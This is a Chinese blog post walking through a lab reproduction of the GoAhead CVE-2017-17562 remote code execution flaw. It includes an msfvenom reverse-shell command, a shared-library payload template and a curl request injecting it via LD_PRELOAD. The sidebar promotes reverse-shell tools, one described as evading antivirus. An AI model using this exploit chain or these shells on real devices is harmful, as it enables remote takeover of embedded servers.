CVE-2017-17562 GoAhea远程代码执行反弹shell姿势

最新推荐文章于 2024-03-20 14:22:09 发布
最新推荐文章于 2024-03-20 14:22:09 发布
阅读量3k 收藏 1
点赞数
分类专栏: 漏洞 文章标签: GoAhea 漏洞 复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u013990050/article/details/78866120
版权

一丶漏洞影响

GoAhea在shodan在搜索出的数量:

GoAhea在shodan上的数量

GoAhea在全球的分布情况:

这里写图片描述

二丶漏洞复现

原输出Hello: World!文章:https://www.elttam.com.au/blog/goahead/
POC:https://www.exploit-db.com/exploits/43360/
攻击机 windows10 IP:192.168.200.1 
靶机 kali IP:192.168.200.128

搭建复现环境:

1丶下载goahead

git clone https://github.com/embedthis/goahead.git

2丶编译存在漏洞版本的goahead

cd goahead/
git checkout tags/v3.6.4 -q 
make > /dev/null

3丶运行goahead服务

cd test
gcc ./cgitest.c -o cgi-bin/cgitest
../build/linux-x64-default/bin/goahead

4丶生成payload

用MSF生成反弹shell的shellcode

msfvenom -p linux/x64/shell/reverse_tcp lhost=192.168.200.1 lport=4443 -f c
编译成反弹sehll的动态链接库, pyload模板:

#include <unistd.h>
#include <stdlib.h>

static void before_main(void) __attribute__((constructor));
static void before_main(void)
{
   //复制msf生成的shellcode到这里
   //加载数组名为buf shellcode并执行
   ((void(*)(void))&buf)();
}
gcc -shared -fPIC ./payload.c -o payload.so -z execstack

5丶带着反弹sehll的动态链接库访问kali上的goahead

curl -X POST --data-binary @payload.so http://192.168.200.128/cgi-bin/cgitest?LD_PRELOAD=/proc/self/fd/0 -i | head

复现过程gif:

这里写图片描述

Ban0yan
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Golang反弹shell(使用邮件获取反弹地址)
09-29
使用邮件地址作为反弹shell的服务器地址,用于windows的反弹shell,可在编译时选择隐藏弹出窗口 This golng reverse shell fetches the address from your latest email subject, and the subject should be like this: 10.1.1.1:1234 This golag file requires go-pop3 lib which you can get it here: https://github.com/taknb2nch/go-pop3.git If you want to hide the window when executing it, compile the program like this: go build -ldflags -H=windowsgui email_reverse_shell-repl.go
GoAhead-远程命令执行漏洞CVE-2017-17562
bqnagus
10-01 683
GoAhead在接收到请求后,将会从URL参数中取出键和值注册进CGI程序的环境变量,且只过滤了`REMOTE_HOST`和`HTTP_AUTHORIZATION`。我们能够控制环境变量,就有很多攻击方式。比如在Linux中,`LD_`开头的环境变量和动态链接库有关,如`LD_PRELOAD`中指定的动态链接库,将会被自动加载;`LD_LIBRARY_PATH`指定的路径,程序会去其中寻找动态链接库。
log4j2远程代码执行漏洞原理与漏洞复现
最新发布
人若无名,便可专心练剑
03-20 1436
在看我写的log4j2远程代码执行漏洞之前,师傅们可以看看我前面写的《JNDI注入原理及利用IDEA漏洞复现》这篇文章,因为log4j2远程代码执行漏洞里面有讲JNDI注入,这样可以对师傅的理解更加深刻也更加容易理解!
GoAhead Web服务器远程命令执行漏洞CVE-2017-17562漏洞复现
Amdy_amdy的博客
09-26 3331
一、漏洞概述: 1、漏洞简介: GoAhead Web Server,它是一个开源(商业许可)、简单、轻巧、功能强大、可以在多个平台运行的嵌入式Web Server。 GoAhead Web Server是跨平台的服务器软件,可以稳定地运行在Windows,Linux和Mac OS X操作系统之上。GoAhead Web Server是开放源代码的,这意味着你可以随意修改Web服务器的功能。...
GoAhead 远程命令执行漏洞CVE-2017-17562反弹shell
Aesthetic99的博客
03-22 6082
GoAhead 远程命令执行漏洞CVE-2017-17562反弹shell GoAhead是一个开源(商业许可)、简单、轻巧、功能强大、可以在多个平台运行的Web Server,多用于嵌入式系统、智能设备。其支持运行ASP、Javascript和标准的CGI程序,这个漏洞就出现在运行CGI程序的时候。 GoAhead在接收到请求后,将会从URL参数中取出键和值注册进CGI程序的环境变量,且只过滤了REMOTE_HOST和HTTP_AUTHORIZATION。我们能够控制环境变量,就有很多攻击方式。比如在
GoAhead 远程命令执行漏洞CVE-2017-17562
EC_Carrot的博客
06-17 1011
漏洞原理 Embedthis GoAhead是美国Embedthis软件公司的一款嵌入式Web服务器。 Embedthis GoAhead 3.6.5之前的版本中存在安全漏洞远程攻击者可利用该漏洞执行代码。 具体详细请看这篇文章:https://github.com/vulhub/vulhub/blob/master/goahead/CVE-2017-17562/README.zh-cn.md 漏洞复现 我们首先需要编译一个动态链接库,而且需要和目标架构相同。所以在实战中,如果对方是一个智能设备,你可能需
CVE-2020-21224 ClusterEngineV4.0 远程代码执行.md
04-11
CVE-2020-21224 ClusterEngineV4.0 远程代码执行
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
CVE-2017-7269-Echo-PoC:CVE-2017-7269回显PoC,用于远程入侵检测。
03-02
CVE-2017-7269远程代码执行回显验证 我们团队对此次发布CVE-2017-7269漏洞的分析报告: ://ht-sec.org/cve-2017-7269-vulnerabilities/ DefaultPoC只能弹calc.exe ,现在修改成可以响应请求,命令格式为: CVE-2017...
hikvision_CVE-2017-7921配置文件解密.rar
05-20
具体影响产品型号,请参考CVE-2017-7921;CVE-2017-7922漏洞详情。 该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。 本程序需和配置文件存放在同一目录下运行exe即可配置文件名...
go语言邮件反弹shell(windows+linux版,windows版用go1.7编译运行不报毒
11-03
go语言邮件反弹shell(windows+linux版,windows版用go1.7编译运行不报毒 此版本为后续改进debug版本,windows下可以编译去掉显示窗口 添加linux版本
端口复用/重用反弹shell
04-14
端口复用/重用反弹shell 可以利用系统已经开启的端口,如:139,445,1025等。
【春秋云镜】Ruby Net::FTP 模块命令注入漏洞(CVE-2017-17405)
weixin_44632654的博客
10-17 173
2.4.3之前的Ruby允许Net :: FTP命令注入
golang写的反弹shell(自作孽不可活,切记,切记!)
热门推荐
神棍之路
10-23 7万+
仅作安全研究 package main import ( "go-pop3" "log" "strings" "os/exec" "net" "fmt" "syscall" "bufio" ) func reverseshell(addr string){ c,_:=net.Dial("tcp", addr);
ctf.show的phpCVE(web311-web315)
wanan的博客
09-30 247
ctf.show的phpCVE(web311-web315)
golang 远程批量执行shell_S2061远程代码执行漏洞复现及批量检测脚本(CVE202017530)...
weixin_30696613的博客
12-26 457
声明由于传播、利用此文所提供的信息或工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,博鸿科技安全服务中心以及文章作者不为此承担任何责任。博鸿科技安全服务中心拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经博鸿科技安全服务中心允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。0x00 软件介绍strut...
利用Vulnhub复现漏洞 - GoAhead 远程命令执行漏洞CVE-2017-17562
JiangBuLiu的博客
07-09 1159
GoAhead 远程命令执行漏洞CVE-2017-17562)Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现动态链接库源码编译so文件发送payload Vulnhub官方复现教程 https://vulhub.org/#/environments/goahead/CVE-2017-17562/ 漏洞原理 GoAhead是一个开源(商业许可)、简单、轻巧、功能强大、可以在多个平台运行...
[Vulhub](CVE-2012-1823)PHP-CGI远程代码执行漏洞
weixin_45605352的博客
03-28 1195
首先理解一下CGI的概念: CGI: CGI 全称是“公共网关接口”(Common Gateway Interface),HTTP 服务器与你的或其它机器上的程序进行“交谈”的一种工具,其程序须运行在网络服务器上。 CGI 可以用任何一种语言编写,只要这种语言具有标准输入、输出和环境变量。如 PHP, Perl, Tcl 等。 作用: CGI是一种根据请求信息动态产生回应内容的技术。 通过CGI,Web服务器可以根据请求不同启动不同的外部程序,并将请求内容转发给该程序,在程序执行结束后,将执行结果作为回应返
cve-2022-30190 msdt远程代码执行漏洞复现
09-10
CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞复现过程。 首先,我们需要使用攻击者控制...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值